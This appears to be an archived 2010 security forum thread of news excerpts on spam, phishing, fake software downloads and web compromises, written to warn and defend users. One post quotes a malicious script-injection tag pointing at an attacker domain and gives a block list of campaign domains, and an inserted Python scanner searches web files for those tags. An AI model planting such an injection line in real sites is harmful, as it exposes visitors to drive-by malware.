View Full Version : SPAM frauds, fakes, and other MALWARE deliveries - archive


2010-05-03, 13:37

Fake HijackThis Toolbar from Facebook
- http://www.symantec.com/connect/blogs/hijackthis-toolbar-facebook
May 2, 2010 - "SPAM emails... have been doing the rounds on the Internet hoping to lure recipients into downloading a Facebook toolbar... the file is neither a Facebook toolbar nor HijackThis. It's a malware detected by Symantec software as Trojan.Dropper..."

(Screenshots available at the URL above.)

- http://blog.trendmicro.com/fake-hijackthis-toolbar-serves-malware/
May 9, 2010


2010-05-03, 19:51

Phish/fraud via FedEx delivery...
- http://isc.sans.org/diary.html?storyid=8734
Last Updated: 2010-05-03 13:53:05 UTC - "... got a fedex envelope with an unexpected check over 2'850$, with him as recipient... called the issuing bank... and found out that the account against which the check was drawn had zero funds. The way this works is that the bad guys follow up the first letter with a second, where they apologize for the mistake, ask the victim to "wire back" 2500$ and "keep the 350$ for your trouble". If you go ahead with this, by the time the check bounces, you have wired the money, and wired money is gone or at least very very hard to get back. Given that the crooks incur quite some expense and risk in this scenario (fedex isn't cheap and often traceable back to the source) they must still be making a killing out of this scam. The second scheme is phishing via old-fashioned paper mail. You get a letter stating that "for security reasons" calling the bank now requires a pin code, included below. Follows a pin code of a length and complexity that makes it unlikely anyone would want to remember it, and two lines down, the helpful comment that the pin code can be changed by calling 1-800-whatever. You do so, and here's what happens next:
Voice: Please enter your account number, followed by the pound key [you type]
Voice: Please enter your current telephone access code [you type in the access code in the letter]
Voice: This access code is incorrect. Please try again. [you type - correctly again]
Voice: This access code is incorrect. Please hold for an operator. [you hold]
Operator: XYZ Bank, my name is QRS, how may I help you [you explain]
Operator: To identify you, we have to ask a couple of security questions. What are the last four digits of your social security number ?
Yep. You get the drift. After this exchange, they have everything they need. Lesson learned: Do not ever call "your bank" on a telephone number included in a letter, email or left on your voice mail. Get to know some employees at the bank branch you do business with, and call them with any questions you might have. Recognizing someone's voice beats a "security pin code" any day."

["This machine has no brain.
...... Use your own."]


2010-05-04, 00:59
FYI... "Welcome to: Completely fake Banking online"...

Corporate Identity Theft
- http://www.f-secure.com/weblog/archives/00001945.html
May 3, 2010 - "For online criminals, it's easy to gain access to stolen bank accounts and credit cards. What's much harder is to empty those accounts without getting caught. For this, criminals need money mules: individuals who are recruited to move the money. In many cases these individuals have no idea they are working for organized crime. When phishing and banking trojan victims realize they've lost their money, the tracks will lead to the money mules — not the real criminals... An example of an active money mule recruiting campaign. This one is done in the name of a company called Finha Capital... The website looks fairly credible and a quick web search shows that indeed, there is a real company with this name, and it has been operating for decades... The problem is, finha-capital .com has nothing to do with Finha Capital Oy. The site is completely fake. The only reason the website finha-capital .com has been created is to use it as a front end to hire gullible end users to do online payments and to move money for the criminals. These guys are using the reputable brand of an existing company to fool people into their scam. And it's not just Finha Capital... Lessons to be learned?
• Realize that identity theft happens to companies as well as to individuals.
• If somebody offers you a work-for-home position that's too good to be true, it probably is.
• Do not move money for others.
• Check that you're really speaking with who you think you're speaking."

(Screenshots available at the F-Secure URL above.)


2010-05-05, 05:36

US Treasury websites compromised
- http://community.websense.com/blogs/securitylabs/archive/2010/05/04/treasury-websites-compromised.aspx
4 May 2010 - "A few of the US Treasury websites were compromised today and loaded a hidden iframe containing exploit code to anyone who visited the following three sites:
* bep .gov
* bep.treas .gov
* moneyfactory .gov ...
This iframe loads a page from gr[REMOVED]ad .com (hosted in Turkey) which in turn redirects to si[REMOVED]e-g .com/jobs/ (hosted in The Netherlands) which is where the exploits are hosted. In this case it's the Eleonore Exploit Kit that is used which has support for several vulnerabilities in Adobe Reader, Flash, Internet Explorer etc... the exploit kit pushes a malicious PDF to the user which exploits a vulnerability in Adobe Reader. At the time of writing only 20% of all AV vendors detected that file*..."

(Screenshots and video available at the Websense URL above.)

* http://www.virustotal.com/analisis/9a274b7d8f7eeadf33b98ebcc9b4c1493e3c3252c7be72b71e8cc08ca1601e63-1272930681
File mal.pdf received on 2010.05.03 23:51:21 (UTC)
Result: 8/40 (20.00%)

U.S. Treasury Site Compromise linked to NetworkSolutions Mass WordPress Blogs Compromise
- http://ddanchev.blogspot.com/2010/05/us-treasury-site-compromise-linked-to.html
May 04, 2010

- http://thompson.blog.avg.com/2010/05/treasury-website-hacked.html
May 03, 2010

- http://pandalabs.pandasecurity.com/usa-treasury-website-hacked-using-exploit-kit/

- http://forums.spybot.info/showpost.php?p=370113&postcount=19
May 5, 2010


2010-05-05, 21:42

iTunes giftcard Phish/SCAM ...
- http://sunbeltblog.blogspot.com/2010/05/steer-clear-of-this-itunes-giftcard.html
May 05, 2010 - "... should the victim hit “Download program”, they’re taken to the endless advert loop of doom from the fake Facebook Hack website*. All in all, a rather horrible thing to fall for – so don’t!"
* http://sunbeltblog.blogspot.com/2010/05/don-be-fooled-by-facebook-hack-website.html
May 05, 2010

(Screenshots available at both URLs above.)

- http://community.websense.com/blogs/securitylabs/archive/2010/05/07/buying-itunes-gift-certificate-malware-spam.aspx
7 May 2010
** http://www.virustotal.com/analisis/0b0b24ca0593723075ef8b103a229b17b86d5b01d624c9ef82c0c74c16ae69ea-1273193875
File ITUNES_C.EXE received on 2010.05.07 00:57:55 (UTC)
Result: 8/41 (19.51%)

- http://www.sophos.com/blogs/gc/g/2010/05/10/danger-fake-50-itunes-certificate-carries-malware/
May 10, 2010


2010-05-07, 18:00

Malicious .SWF file may trigger a DoS attack
- http://blog.trendmicro.com/malicious-swf-file-may-trigger-a-dos-attack/
May 7, 2010 - "... Shockwave Flash (.SWF) file that displays an image and downloads a worm with code capable of initiating a denial-of-service (DoS) attack. The file detected as SWF_PALEVO.KK is hosted on a malicious site and runs whenever users access the site. Once loaded, it displays a screenshot of a YouTube video. The said image, however, is embedded with a malicious link... Clicking the image leads users to a malicious site (http://www.{BLOCKED}com.com/{BLOCKED}layer10.0.45.2.exe) to download a file detected by Trend Micro as WORM_PALEVO.KK. Upon execution, the worm displays a fake dialog box purporting to be an Adobe Flash Player installation with instructions in French. Clicking -any- of the given choices leads to the execution of the malware on the affected system... Apart from infecting users’ systems, however, WORM_PALEVO.KK can also initiate a DoS attack that can disable a website, shut down a network, or disrupt a service. This attack is initiated by a remote server that is controlled by a malicious user. The worm receives commands from the remote server to perform several actions such as downloading other malware, downloading updates of itself, and launching a SYN flood attack against target systems. It can also spread and infect a large number of systems since it propagates using MSN Messenger and peer-to-peer (P2P) applications. The variants WORM_PALEVO.KK and SWF_PALEVO.KK are detections related to the Mariposa botnet. Users are strongly advised -against- visiting suspicious-looking sites and clicking the links and images found in them..."


2010-05-09, 05:00

Koobface gang... (inside Facebook) scareware serving compromised sites
- http://ddanchev.blogspot.com/2010/05/from-koobface-gang-with-scareware.html
May 08, 2010 - "... Immediately after the suspension of their automatically registered Blogspot accounts, the gang once again proved that it has contingency plans in place, and started pushing links to compromised sites, in a combination with an interesting "visual social engineering trick", across Facebook, which sadly works pretty well, in the sense that it completely undermines the "don't click on links pointing to unknown sites" type of security tips... This active use of the "trusted reputation chain", just like the majority of social engineering centered tactics of the gang, aim to exploit the ubiquitous weak link in the face of the average Internet user... Clicking on this link inside Facebook leads to... a Koobface bogus video...
* Detection rates:
- setup.exe - Mal/Koobface-E; W32/VBTroj.CXNF - Result: 7/41 (17.08%)
- RunAV_312s2.exe - VirTool.Win32.Obfuscator.hg!b (v); High Risk Cloaked Malware - Result: 4/41 (9.76%) ..."

(More detail and info links at the //ddanchev URL above.)


2010-05-09, 18:52

Mothers Day SPAM...
- http://blog.trendmicro.com/spammers-celebrate-mothers%E2%80%99-day/
"May 9 is Mothers’ Day for most countries all over the world. As a perfect gift on this particular holiday, spammers decided to honor mothers by spamming e-cards from supposedly legitimate greeting card companies to distribute their malicious wares... an email in HTML format using a template from Florists’ Transworld Delivery (FTD), a floral wire service... the usual short spam in plain text format with a URL that redirects the user to a malicious site... Though the URLs in the spam are not accessible, users should remember that spammers will try just about anything to encourage people to purchase the products they advertise..."

(Screenshots available at the URL above.)


2010-05-10, 23:07

Google Groups - malicious SPAM...
- http://www.m86security.com/labs/i/Google-Groups-malicious-spam-campaign,trace.1338~.asp
May 9, 2010 - "... large scale spam campaign, with links leading to Fake Anti-virus "scareware". The spam is originating from the Pushdo botnet, which is notorious for these sorts of malicious campaigns. The spam is not that unusual, rather it comes disguised as an 'administrator' message suggesting your mailbox settings need to be updated... The links all lead to various Google Groups pages where files called setup.zip have simply been uploaded by the attackers..."

(Screenshot available at the URL above.)


2010-05-11, 14:45

Fake Win7 compatibility checker - more malware in SPAM...
- http://www.theregister.co.uk/2010/05/11/win7_trojan/
11 May 2010 - "... The malware comes as a zip-based attachment to email messages supposedly offering "help" on upgrading Windows boxes. But this "Windows 7 Upgrade Advisor Setup" assistant offers only a Trojan, instead of the promised compatibility checking tool. Windows users who open and run the application end up with systems compromised with a backdoor that allows hackers to insert other viruses and spyware... The main lessons from the attack are that the contents of unsolicited messages are best ignored and, secondly, that virus writers are always trying out new social engineering tricks to dupe the unwary..."


2010-05-17, 17:47

Windows “activation” ransomware
- http://sunbeltblog.blogspot.com/2010/05/windows-activation-ransomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."

(Screenshots available at the URL above.)


2010-05-19, 12:02
FYI... 'suggest BLOCK THEM ALL...

- http://community.websense.com/blogs/securitylabs/archive/2010/05/19/My-Wordpress-blog-got-injected-_2D00_-again_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)

- http://www.malwaredomains.com/wordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...

GoDaddy attacks continue...
- http://blog.sucuri.net/2010/05/continuing-attacks-at-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
You can clean up using this script:
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
May 12, 2010

- http://google.com/safebrowsing/diagnostic?site=kdjkfjskdfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=holasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."

- http://google.com/safebrowsing/diagnostic?site=indesignstudioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=zettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."
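A defender-side check for the injection described in this post, added here as an example and not code from Sucuri, Websense or the poster: it walks a web root and reports any file that loads a script from one of the domains named above. The domain list and the sample files are constructed from the posts; a hit should still be cleaned by restoring from a known-good copy, since the attackers modified every PHP file on affected accounts.

```python
"""Scan a web root for the injected <script src> tags quoted above.

Constructed example; the blocklist holds the domains named in the
Websense / Sucuri posts and the sample web root is built in a temporary
directory so the script runs offline.
"""
import os
import re
import tempfile
from typing import List, Tuple

# Domains named in the posts above (re-fanged from "losotrana .com" etc.).
INJECTED_DOMAINS = frozenset({
    "losotrana.com",
    "holasionweb.com",
    "kdjkfjskdfjlskdjf.com",
    "indesignstudioinfo.com",
    "zettapetta.com",
})

# The campaign modified PHP files; static pages and JS are scanned too,
# since an injected include can end up emitting the tag into them.
SCAN_SUFFIXES = (".php", ".html", ".htm", ".js")

# Match any <script ... src="http(s)://host/..."> and capture the host.
SCRIPT_SRC_RE = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']\s*https?://([^/"'\s:]+)""",
    re.IGNORECASE,
)


def injected_hosts(text: str) -> List[str]:
    """Return the blocklisted hosts loaded by external <script src> tags."""
    hits = []
    for m in SCRIPT_SRC_RE.finditer(text):
        host = m.group(1).lower()
        bare = host[4:] if host.startswith("www.") else host
        if bare in INJECTED_DOMAINS:
            hits.append(bare)
    return hits


def scan_webroot(root: str) -> List[Tuple[str, str]]:
    """Walk root and return (relative path, domain) for every injected tag."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            for host in injected_hosts(text):
                findings.append((os.path.relpath(path, root), host))
    return sorted(findings)


def build_sample_webroot() -> str:
    """Create a constructed web root: one clean page and two injected pages."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "wp-content"))
    samples = {
        # Clean: loads only a same-origin script.
        "index.php": "<?php echo 'hello'; ?>\n<script src=\"/js/app.js\"></script>\n",
        # The tag quoted in the Sucuri post, appended to an existing PHP file.
        "wp-content/footer.php": (
            "<?php wp_footer(); ?>\n"
            "<script src=\"http://losotrana.com/js.php\"></script>\n"
        ),
        # Earlier domain from the same campaign, single quotes and a www. prefix.
        "about.html": (
            "<html><body>About</body>"
            "<script type='text/javascript' src='http://www.holasionweb.com/js.php'>"
            "</script></html>"
        ),
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, host in scan_webroot(build_sample_webroot()):
        print(f"INJECTED  {rel}: loads script from {host}")
```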


2010-05-20, 14:37

Twitter attack - in progress...
- http://www.f-secure.com/weblog/archives/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."


2010-05-21, 21:14

AutoRun worms still alive...
- http://blog.trendmicro.com/new-autorun-worms-utilize-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmicro.com/how-to-maximize-the-malware-protection-of-your-removable-drives/


2010-05-23, 14:19

Beware the trader bearing free gifts...

- http://gizmodo.com/5544593
May 21, 2010 - "... lecturing on the importance of protecting PCs..."

- http://preview.tinyurl.com/2bjdjau
22 May 2010 - "... over 99 different malicious applications were used in this and last weekend's attacks."


2010-05-27, 01:01

FIFA fans - Scam targets
- http://blog.trendmicro.com/latest-online-scam-targets-fifa-fans/
May 26, 2010 - "The upcoming “2010 FIFA World Cup” in South Africa is one of the most highly anticipated events in sports history today... two separate SPAM runs leveraging the said event. The first spam sample had a .DOC file attachment that informs recipients of a supposed new contest called “Final Draw” organized in part by the FIFA Organizing Committee. It also tells the recipient of a US$550,000 prize. To claim this, however, the “winner” must immediately coordinate with the releasing agent via the contact information indicated in the email. The email also asks the recipient to give out personal information... This asks recipients to divulge specific information in relation to a fund transfer transaction amounting to a whopping US$10.5 million. Upon agreeing to the proposal, the recipient should supposedly get 30 percent of the said amount. Note that this tactic is reminiscent of the infamous 419 or Nigerian scam, which persuaded users to send cash by promising them a large amount of money in return for their cooperation... In fact, FIFA sternly warned fans of similar online scams*..."
* http://www.pcworld.com/article/197056/FIFA_Tickets.html

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-spammers-raise-their-game
May 27, 2010

- http://www.f-secure.com/weblog/archives/00001964.html
June 9, 2010


2010-05-27, 10:52

44 million stolen gaming credentials uncovered
- http://www.symantec.com/connect/blogs/44-million-stolen-gaming-credentials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."

* http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-052013-2257-99

** http://www.symantec.com/security_response/writeup.jsp?docid=2006-111201-3853-99


2010-05-27, 11:03

Credit union fraud via phish for U.S. Servicemen and Vets
- http://www.symantec.com/connect/blogs/online-fraudsters-catch-us-servicemen-and-veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http :// ...) based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."


2010-05-29, 03:41

boingboing .com spews malware...
- http://news.cnet.com/8301-27080_3-20005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize.com/2010/05/beware-of-boingboingcom-malware.html


2010-05-30, 13:57

Facebook attacked again...
- http://community.websense.com/blogs/securitylabs/archive/2010/05/28/most-hilarious-video-attack-on-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page looks like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to login..."
(Screenshots available at the URL above.)

- http://blog.webroot.com/2010/05/28/facebook-spam-leads-to-viagra-vendor-drive-by-download/
May 28, 2010

- http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."


2010-06-02, 02:51

... Top Web Malware in May
- http://blog.scansafe.com/journal/2010/6/1/godaddy-attacks-top-web-malware-in-may.html
June 1, 2010 - "Some interesting stats from May.
• 16196 unique malicious domains.
• The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
• Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
• Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
• Gumblar was the second most prevalent Web malware encountered, at 7%.
• Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.
Top Ten Malicious Domains, May 2010
holasionweb .com* - 7%
www .sitepalace .com - 3%
losotrana .com* - 2%
indesignstudioinfo .com* - 2%
kdjkfjskdfjlskdjf .com* - 2%
easfindnex .org - 2%
findermar .org - 2%
findrasup .org - 1%
zettapetta .com* - 1%
*Related to attacks against GoDaddy-hosted websites
Top Ten Web Malware, May 2010
Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2% "


2010-06-03, 00:05

Samsung Wave - infected microSD card
- http://www.engadget.com/2010/06/02/samsung-wave-shipping-with-infected-microsd-card/
June 2, 2010 - "Did you get a Samsung Wave today, or perhaps early last week? You might not want to connect it to your computer, just in case. We're hearing anecdotal reports that the 1GB microSD card shipped with certain German units includes a nasty surprise: it automatically installs the trojan Win32/Heur using the file "slmvsrv.exe"...
Update: Samsung HQ got in touch with MobileBurn to confirm the existence of the virus in shipping S8500 Wave handsets, but said that the outbreak was confined to the German market's initial production run and all other shipments are A-OK. Still, there's no harm in disabling autorun before connecting one to your PC, eh?"


2010-06-03, 16:37

FBI Spam ? ...
419 Scam Resurfaces with FBI SPAM
- http://blog.trendmicro.com/spammers-pose-as-fbi-to-send-out-scam-mail/
June 3, 2010 - "Cybercriminals have found yet another way to grab users’ attention. This time, they posed as members of the Federal Bureau of Investigation (FBI) from Washington D.C. to scam users with a spammed message... As in any other scam, the email sender posed as someone from a legitimate body in this attack. The sender claims to be from the FBI. The spam, meanwhile, informs the recipient that he/she is the beneficiary of US$10.5 million. The fake FBI representative then gives the recipient instructions to contact the head of the “Online Transfer Department” of the United Trust Bank London. The said head, urges the email, is the only person who can take responsibility for giving out the promised millions. It even advises the email recipient to strictly follow the instructions in order to make the claim. This, of course, is a hoax. For greater irony and to prove that cybercriminals will go for desperate measures to trick their victims, a note has even been added at the end. This informs the recipient of possible fraudsters who might attempt to deal with him/her. To avoid becoming a victim of such a scam, always pay attention to every detail in email messages you receive. One can easily distinguish what is real and what is fake via careful observation. All you need to do is to carefully observe..."

(Screenshot available at the URL above.)


2010-06-04, 12:08

Twitter malicious SPAM - password reset...
- http://community.websense.com/blogs/securitylabs/archive/2010/06/03/reset-your-twitter-password-spam.aspx
03 Jun 2010 07:18 PM - "Websense... has detected a spam posing as a Twitter Password Reset Notification. We have seen about 55,000 instances of this malicious spam email so far... The spam contains a link to a compromised Web site that, when clicked or pasted into the browser, prompts the user to download a malicious executable named password.exe. The executable turns out to be a rogue AV called Protection Center Safebrowser. What distinguishes this rogue AV from the others is that it actually displays on the user's desktop some of the malicious files it installs. This makes the attack notification more believable. The attack is detected as Trojan.Generic.Win32 (SHA:0b00649c14b96219dd080a0ce6492c4d04c7f45c) and is currently recognized by 19 of the 41 engines on Virus Total*..."
* http://www.virustotal.com/analisis/7aa1b331625dc2d809ead0ddcb802ceea78ba8a7fa2dd411e7a349d8381e9332-1275590333
File 204bec9018693bba6200c0280cf4366e9 received on 2010.06.03 18:38:53 (UTC)
Result: 19/41 (46.34%)

(Screenshots available at the Websense URL above.)


2010-06-09, 14:22

SPAM campaigns send millions of emails
- http://community.websense.com/blogs/securitylabs/archive/2010/06/07/spam-summary-of-last-weekend.aspx
7 Jun 2010 - "Websense... detected 3 spam campaigns with millions of emails...
• Confirm Twitter password, and Twitter security model setup ...
• Facebook account deactivated, or invited by somebody famous ...
• Outlook Setup Notification ...
The statistics... show that spam increased by 15,700 daily on average during the weekend, compared to work days..."

(Screenshots available at the URL above.)


2010-06-10, 15:47

ZeuS SPAM attack spoofs IRS, Twitter, Youtube
- http://krebsonsecurity.com/2010/06/zeus-trojan-attack-spoofs-irs-twitter-youtube/
June 9, 2010 - "Criminals have launched a major e-mail campaign to deploy the infamous ZeuS Trojan, blasting out spam messages variously disguised as fraud alerts from the Internal Revenue Service, Twitter account hijack warnings, and salacious Youtube.com videos. According to Gary Warner, director of research in computer forensics at the University of Alabama, Birmingham, this latest attack* appears to be an extension of a broad malware spam campaign that began at the end of May. The fake IRS e-mails arrive with the tried-and-true subject line “Notice of Underreported Income,” and encourage the recipient to click a link to review their tax statement. All of the latest e-mails use a variety of URL shortening services... Warner said anti-virus detection for this malware is extremely low: Only three out of 40 different anti-virus products detected the file as malicious**, yet none of those currently identify it for what it is: Another new version of the ZeuS Trojan. These broad attacks usually are quite successful, and in the past they have been used to great effect by the same criminal gangs that have been stealing tens of millions of dollars from small to mid-sized businesses..."
* http://garwarner.blogspot.com/2010/06/irs-malware-notice-of-underreported.html
June 08, 2010

** http://www.virustotal.com/analisis/9ab48099e99fe48d6b0bcfa2a78d2f58f274b3bc3b9edfaf96dcbaeb619cdc96-1276042845
File 1276042605.tax-statement.exe received on 2010.06.09 00:20:45 (UTC)
Result: 3/40 (7.50%)


2010-06-10, 18:33

SCAMS - Gulf oil spill ...
- http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt058.shtm
06/09/2010 - "... The Federal Trade Commission... cautions consumers and businesses to be on the alert for fraudulent activity related to the explosion aboard the Deepwater Horizon drilling rig and the resulting spill – and to report their experiences to federal and state authorities. British Petroleum (BP) leased the rig, which was owned and operated by Transocean. The FTC says it’s likely that scammers will use e-mails, websites, door-to-door collections, flyers, mailings and telephone calls to make contact and solicit money. Some may claim they’re raising money for environmental causes or offer fraudulent services – like remediation services – related to the oil spill. Others may claim they can expedite loss claims for a fee. Still others may knock on your door and talk about placing booms or checking for oil on your property. Chances are they’re trying to gain your trust to get inside your home or get access to your personal information. The FTC says that at the very least, you will want to do some homework before making a donation or entering into an agreement for services..."
- http://www.ftc.gov/charityfraud/

(More detail at -both- FTC URLs above.)

Also see:
- http://www.avertlabs.com/research/blog/index.php/2010/06/09/peering-into-the-affiliate-marketing-window/

- http://www.infosecurity-us.com/blog/2010/6/7/135-000-fake-youtube-pages-delivering-malware/168.aspx
June 7, 2010 - "... Attempting to play the video on these fake pages prompts the user to install a ‘media codec’ which then infects the machine with malware... fake YouTube pages are well crafted and look almost identical to the real site. By using websites like YouTube, cyber criminals are taking advantage of users’ inherent trust in the site and are able to infect more machines. Each page claims to have a “Hot Video” associated with anything from the Gulf Oil Spill to the NBA Playoffs. Google search results show 135,000 of these infected pages at the time of writing..."


2010-06-14, 18:30

More World Cup scams, SPAM, etc...

- http://sunbeltblog.blogspot.com/2010/06/world-cup-visa-phishers-come-off-bench.html
June 14, 2010

- http://www.symantec.com/connect/blogs/fifa-world-cup-watch-all-matches-free-adult-video-site
June 13, 2010

- http://www.sophos.com/blogs/sophoslabs/?p=10015
June 11, 2010

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-and-cybercrime-end-user-survey
June 10, 2010- "... best practices:
• Don’t open unsolicited e-mails or social media messages purporting to contain special offers or extraordinary deals related to the World Cup, and especially don’t click on any links in such messages.
• If an online offer appears to be too good to be true, it probably is. Scammers often try to make their bogus offers sound so great that they would be nearly impossible to pass up…if they were real that is.
• Be careful about what “official” social networking accounts you follow, such as those that appear to be created by World Cup teams or players. Often, cybercriminals will create accounts posing to be someone they’re not.
• When searching for online video of the World Cup, avoid sites you’ve never heard of before and if you’re told you must update your media player before viewing a video, be very cautious as this might be a ploy by attackers to get you to download malware..."

- http://pandalabs.pandasecurity.com/extreme-sports-2010-fifa-world-cup-bhseo-attack/


2010-06-15, 16:16

Twitter - PDF exploit SPAM run... in progress
- http://sunbeltblog.blogspot.com/2010/06/pdf-exploit-spamrun-on-twitter.html
June 15, 2010 - "There appears to be a bit of a mad dash to infect people by the boatload on Twitter, with a variety of different messages being sent to random targets... account endlessly says “Wow, a marvelous product”. Click the link, and you might be redirected to some sort of paid movie service... If you’re unlucky, however, you’ll end up at a URL such as fqsmydkvsffz(dot)com/tre/vena(dot)html, where PDF exploits await... phrases used for this spamrun include:
Wow, An incredible Product
Wow, A shocking Discovery
Watch This
I Just Cant Beleive This
Wow, A stunning Product
Wow, A Revolutionary Product
Wow, A fascinating Site
This isn't the first malicious spamrun on Twitter, and it certainly won't be the last. With that in mind, it might be best to avoid random links sent to you from strangers. You never quite know what’s at the other end."


2010-06-17, 16:10

